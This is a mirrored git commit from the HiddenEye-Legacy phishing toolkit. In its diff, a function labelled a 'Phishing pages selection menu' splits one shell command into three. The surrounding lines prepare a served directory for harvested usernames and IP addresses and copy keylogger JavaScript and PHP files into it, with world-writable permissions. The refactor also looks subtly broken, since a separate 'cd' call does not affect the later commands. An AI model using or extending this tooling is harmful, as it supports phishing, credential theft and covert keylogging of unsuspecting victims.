mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Cut 1 command in three
This commit is contained in:
parent
6cc720c818
commit
2bd8535459
|
@ -228,7 +228,9 @@ ________________________________________________________________________________
|
||||||
|
|
||||||
|
|
||||||
def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
def start_phishing_page(page, custom_option): # Phishing pages selection menu
|
||||||
run_command('cd Server && mkdir www && chmod 777 Server -R')
|
run_command('cd Server')
|
||||||
|
run_command('mkdir www')
|
||||||
|
run_command('chmod 777 Server -R')
|
||||||
run_command('rm -r Server/www/ && mkdir Server/www')
|
run_command('rm -r Server/www/ && mkdir Server/www')
|
||||||
run_command('touch Server/www/usernames.txt && touch Server/www/ip.txt')
|
run_command('touch Server/www/usernames.txt && touch Server/www/ip.txt')
|
||||||
run_command('cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/ && rm -rf link.url')
|
run_command('cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/ && rm -rf link.url')
|
||||||
|
|
Loading…
Reference in New Issue
Block a user